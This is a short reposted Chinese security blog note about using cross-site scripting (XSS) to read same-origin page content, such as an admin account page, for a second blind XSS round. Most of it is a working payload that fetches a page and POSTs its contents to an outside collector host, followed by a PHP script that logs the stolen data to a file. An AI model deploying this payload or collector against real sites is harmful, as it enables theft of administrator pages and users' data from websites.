js读取其他网页内容(同源)

本文转载自查看原文 2020-07-16 17:57 884 笔记/ web安全/ 网络安全

通过xss第一次取得网页内容，然后获取到管理员账号页面进行二次盲打。js需要保留script部分其余去除。

<html><p id='d1'></p>
<script>
function get(url) {
    try {
        var req = new XMLHttpRequest();
        req.open('GET', url, false);
        req.send(null);
        if(req.status == 200)
            return req.responseText;
    } catch(err) {
    }
    return null;
}
function post(url,content){
    var req = new XMLHttpRequest();
    req.open("POST", url, true);
    var formData = new FormData();
    formData.append("cc", content);
    req.send(formData);
}
var role = get('/static/e.js;');
post('http://example.com/http.php',escape(role));
document.getElementById("d1").innerHTML=role.length;
</script></html>

http.php 获取到的内容写入save.txt

<?php
file_put_contents('save.txt', $_REQUEST["cc"]."\n",FILE_APPEND);
print("ok");

来源

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 java读取网页内容通过js修改网页内容任意修改网页内容JS代码怎样抓取网页内容利用socket与ssl模块读取网页内容网页内容导出word/excel的js代码 js，css控制网页内容不让选中和复制使用JS网页内容保存为PDF 【html】css、js实现网页内容禁止选中 Golang: 抓取网页内容